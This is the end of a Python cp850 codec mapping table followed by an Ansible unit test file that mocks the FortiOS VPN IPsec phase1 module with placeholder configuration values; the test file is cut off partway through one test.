0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
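# A minimal round-trip check (illustrative addition, not part of the
# gencodec.py output): it feeds two bytes through the charmap primitives
# using the tables defined above, and only runs when executed directly.
if __name__ == '__main__':
    # 0x80 decodes to U+00C7 and 0x9b to U+00F8 per decoding_table
    text, _ = codecs.charmap_decode(b'\x80\x9b', 'strict', decoding_table)
    assert text == u'\xc7\xf8'
    # encoding_map maps the code points back to the original bytes
    data, _ = codecs.charmap_encode(text, 'strict', encoding_map)
    assert data == b'\x80\x9b'
    print('cp850 round trip ok')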
|
kustodian/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_vpn_ipsec_phase1.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_vpn_ipsec_phase1
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_vpn_ipsec_phase1.Connection')
return connection_class_mock
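# Note: the handler below is built once at import time, with the fixture
# *function* itself standing in for a connection object. This only works
# because every test monkeypatches the handler's set/delete/schema methods,
# so the connection is never actually exercised.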
fos_instance = FortiOSHandler(connection_mock)
def test_vpn_ipsec_phase1_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
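    # The module is expected to translate the underscore keys accepted by
    # Ansible into the hyphenated field names of the FortiOS API: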
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_vpn_ipsec_phase1_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_vpn_ipsec_phase1_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
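# Idempotency convention exercised below: a 404 with http_method 'DELETE'
# returned from set() means "already in the desired state", so the module
# must report neither an error nor a change.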
def test_vpn_ipsec_phase1_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
